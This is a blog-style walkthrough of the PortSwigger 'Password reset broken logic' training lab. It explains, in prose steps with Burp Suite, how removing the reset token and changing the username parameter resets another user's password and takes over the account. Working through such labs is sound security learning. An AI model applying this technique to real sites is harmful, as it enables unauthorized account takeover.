Daemon Of Hacking
  • WELCOME!
    • 👋/home/usr/KruKnight
  • METHODOLOGIES & RESOURCES
    • Passwords & Attacks
    • Post Exploitation
      • 👀Situational Awareness
      • 🖥️Privilege Escalation
        • Linux Privilege Escalation
        • Windows Privilege Escalation
  • Writeups
    • CyCtf 2024
      • Vending Machine
      • Aerospace
      • OhMyCell
    • Portswigger Labs
      • Authentication
        • Username enumeration via different responses
        • 2FA simple bypass
        • Password reset broken logic
        • Username enumeration via subtly different responses
        • Username enumeration via response timing
        • Broken Brute-Force Protection, IP Block
        • Username enumeration via account lock
        • 2FA broken logic
        • Brute-forcing a stay-logged-in cookie
        • Offline password cracking
        • Password reset poisoning via middleware
        • Password brute-force via password change
        • Broken brute-force protection, multiple credentials per request
      • Os Command Injection
        • OS command injection, simple case
        • Blind OS command injection with time delays
        • Blind OS command injection with output redirection
        • Blind OS command injection with out-of-band interaction
        • Blind OS command injection with out-of-band data exfiltration
      • Cross-Origin Resource Sharing (CORS)
        • CORS vulnerability with basic origin reflection
        • CORS vulnerability with trusted null origin
        • CORS vulnerability with trusted insecure protocols
      • Server-side template injection
        • Basic server-side template injection
        • Basic server-side template injection (code context)
      • Server-Side Request Forgery (SSRF)
        • Basic SSRF against the local server
        • Basic SSRF against another back-end
        • Blind SSRF with out-of-band detection
        • SSRF with blacklist-based input filter
        • SSRF with filter bypass via open redirection vulnerability
      • Path Traversal
  • 🟩HTB Writeups
    • Heal
Powered by GitBook
On this page
  • Lab description
  • Walkthrough
  • Step 1: Understand the Password Reset Functionality
  • Step 2: Inspect the Email Reset Link
  • Step 3: Analyze the Reset Password Request
  • Step 4: Exploit Logic Flaw
  • Step 5: Reset Carlos’s Password:
  • Step 6: Verify Access to Carlos’s Account

Was this helpful?

  1. Writeups
  2. Portswigger Labs
  3. Authentication

Password reset broken logic

Previous2FA simple bypassNextUsername enumeration via subtly different responses

Last updated 6 months ago

Was this helpful?

Lab description

Walkthrough

Step 1: Understand the Password Reset Functionality

Begin by navigating to the login page and selecting the "Forgot password?" link. The application will prompt you to enter a username. Start by testing the reset process with your own account, using the username wiener.

When going to the forget password page we find that it asks for a username so we type our account username wiener and click submit

Step 2: Inspect the Email Reset Link

After submitting your username, an email is sent to your associated email account. This email contains a reset link, which directs you to a page prompting you to enter a new password twice.

Step 3: Analyze the Reset Password Request

Submit a new password, and intercept the request using Burp Suite. Carefully inspect the request payload. You will notice:

  • A temp-forgot-password-token is included in both the header and the body of the request.

  • A username parameter specifies which account’s password is being reset.

Step 4: Exploit Logic Flaw

After analyzing the request, remove the temp-forgot-password-token from both the header and the body. Resubmit the request. Observe that the server processes the request without validating the token. This indicates that the token isn’t required to reset the password.

Step 5: Reset Carlos’s Password:

First, request a password reset for Carlos by entering his username on the "Forgot password?" page.

  • Intercept the reset request for your own account (Wiener) and modify the username field to carlos. Update the new-password-1 and new-password-2 fields to the desired new password for Carlos (e.g., KruKnight).

  • Send the modified request.

Step 6: Verify Access to Carlos’s Account

Navigate to the login page, enter carlos as the username and the newly set password. You should successfully log in to Carlos’s account, confirming the exploit worked.